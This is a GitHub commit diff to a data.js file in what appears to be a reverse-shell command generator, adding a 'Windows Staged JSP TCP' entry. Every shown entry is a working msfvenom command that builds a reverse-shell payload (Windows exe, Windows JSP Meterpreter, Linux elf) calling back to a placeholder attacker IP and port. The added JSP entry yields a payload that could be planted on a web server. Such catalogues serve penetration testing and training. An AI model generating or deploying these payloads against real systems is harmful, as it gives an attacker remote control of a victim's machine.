Update data.js

Added Windows JSP staged payload for MSFVenom
This commit is contained in:
Ryan Montgomery 2023-03-10 11:25:01 -05:00 committed by GitHub
parent f4c81c8cec
commit f672f18484
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -404,6 +404,11 @@ const msfvenomCommands = withCommandType(
"command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe", "command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
"meta": ["msfvenom", "windows", "stageless", "reverse"] "meta": ["msfvenom", "windows", "stageless", "reverse"]
}, },
{
"name": "Windows Staged JSP TCP",
"command": "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f jsp -o ./rev.jsp",
"meta": ["msfvenom", "windows", "staged", "reverse"]
},
{ {
"name": "Linux Meterpreter Staged Reverse TCP (x64)", "name": "Linux Meterpreter Staged Reverse TCP (x64)",
"command": "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf", "command": "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f elf -o reverse.elf",